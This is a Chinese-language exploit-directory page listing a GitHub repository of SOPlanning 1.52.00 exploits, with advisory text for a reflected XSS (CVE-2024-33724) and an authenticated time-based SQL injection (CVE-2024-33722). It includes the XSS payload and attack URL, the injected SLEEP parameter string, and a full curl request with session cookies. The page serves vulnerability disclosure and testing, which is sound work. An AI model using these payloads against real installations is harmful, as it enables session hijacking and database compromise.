Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
soplanning-1.52-exploits — SOPlanning 1.52.00 CSRF/SQLi/XSS (CVE-2024-33722, CVE-2024-33724) | Kitploit
工具/GitHubGitHub/fuzzlove/soplanning-1.52-exploits
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubfuzzlove/soplanning-1.52-exploits

soplanning-1.52-exploits

SOPlanning 1.52.00 CSRF/SQLi/XSS (CVE-2024-33722, CVE-2024-33724)

查看仓库
2年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

漏洞标题:SOPlanning v1.52.00 'groupe_save.php' XSS(反射型XSS)

应用程序:SOPlanning

版本:1.52.00

日期:2024年4月22日

漏洞作者:Joseph McPeters (Liquidsky)

供应商主页:https://www.soplanning.org/en/

软件链接:https://sourceforge.net/projects/soplanning/

测试平台:Linux

CVE:CVE-2024-33724

漏洞利用:https://github.com/fuzzlove/soplanning-1.52-exploits/blob/main/soplanning-XSS-README.txt

描述:SOPlanning v1.52.00 存在 XSS 漏洞,通过 'groupe_id' 参数,远程未认证攻击者可劫持管理员账户或其他用户账户。远程攻击者可劫持用户会话或凭据,并完全接管整个平台。

示例载荷: "><!--

反射型XSS链接:/soplanning/www/process/groupe_save.php?saved=1&groupe_id="><!--&nom=Project+New

分析:登录页面接收用户输入参数后,重定向至显示XSS的页面。漏洞利用中包含的载荷转义了变量所在位置,并注释掉剩余部分,从而对包括管理员在内的任意已认证用户实施有效的反射型XSS攻击。


漏洞标题:SOPlanning v1.52.00 'projets.php' SQL注入

应用程序:SOPlanning

版本:1.52.00

日期:2024年4月22日

漏洞作者:Joseph McPeters (Liquidsky 又名 fuzzlove)

供应商主页:https://www.soplanning.org/en/

软件链接:https://sourceforge.net/projects/soplanning/

测试平台:Linux

CVE:CVE-2024-33722

漏洞利用:https://github.com/fuzzlove/soplanning-1.52-exploits/blob/main/soplanning-sqli-README.txt

描述:SOPlanning v1.52.00 的 'projects.php' 页面存在已认证的 SQL 注入漏洞。

说明:向主机进行身份验证,凭据可通过 CSRF 漏洞获取(更多信息见内)。获取有效凭据后,使用 GET/POST 请求发送等同于有效 SQL 注入的参数。

针对请求 "/www/projets.php" 的易受攻击请求参数:

filtreGroupeProjet=1&statut[]=todo'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+'Liquidsky'='Liquidsky&rechercheProjet=test

上述参数可通过有效的 GET 或 POST 请求发送,以触发 SQL 注入。 用于重新测试 SQL 注入的示例 Curl 请求:

curl -i -s -k -X $'POST'
-H $'Host: 127.0.0.1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 130' -H $'Origin: http://127.0.0.1' -H $'Connection: close' -H $'Referer: http://127.0.0.1/soplanning/www/projets.php' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1'
-b $'dateDebut=23/04/2024; dateFin=23/06/2024; xposMoisWin=0; xposJoursWin=0; yposMoisWin=0; yposJoursWin=0; yposProjets=33; PHPSESSID=ovpbclvbc87uh7anfbq2luf9bi; soplanningplanning_=hhrtf0rgs562vm8rhn5i641481; baseLigne=users; baseColonne=jours; afficherTableauRecap=1; masquerLigneVide=0; statut_projet=%5B%22abort%22%2C%22archive%22%2C%22done%22%2C%22progress%22%2C%22todo%22%5D'
--data-binary $'filtreGroupeProjet=1&statut[]=todo'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+'Liquidsky'='Liquidsky&rechercheProjet=test'
$'http://127.0.0.1/soplanning/www/projets.php'

注意:Cookie 需要经过身份验证,请求必须有效才能实现有效的 SQL 注入。该 curl 请求可配合代理使用,以重构有效请求。

下载工具